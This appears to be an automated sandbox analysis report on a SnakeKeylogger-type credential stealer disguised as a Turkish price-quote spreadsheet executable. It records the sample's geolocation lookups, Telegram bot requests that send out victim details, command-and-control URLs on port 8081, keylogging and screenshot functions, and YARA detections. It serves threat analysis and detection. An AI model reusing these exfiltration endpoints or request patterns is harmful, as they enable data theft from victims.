Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2026/09/2024%20/%2022:26:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20and%20Time:%2027/09/2024%20/%2004:36:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216865%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 07:00:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 07:00:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000433000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000433000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092066185.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000A.00000002.2131580011.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000433000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000435000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216865%0D%0ADate%20a
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003125000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003156000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003116000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003120000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlBcq
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003116000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enx
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003102000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003092000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003024000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003092000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003102000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003024000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003156000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003151000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lBcq
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003147000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/x
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to capture screen (.Net source)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Contains functionality to log keystrokes (.Net Source)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_02874B64 0_2_02874B64
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_0287DE4C 0_2_0287DE4C
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_06C14E80 0_2_06C14E80
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167C146 9_2_0167C146
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01677118 9_2_01677118
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167A088 9_2_0167A088
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01675362 9_2_01675362
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167D278 9_2_0167D278
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167C468 9_2_0167C468
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167C738 9_2_0167C738
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_016769A0 9_2_016769A0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167E988 9_2_0167E988
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01673B8C 9_2_01673B8C
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167CA08 9_2_0167CA08
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167CCD8 9_2_0167CCD8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167CFAA 9_2_0167CFAA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167F631 9_2_0167F631
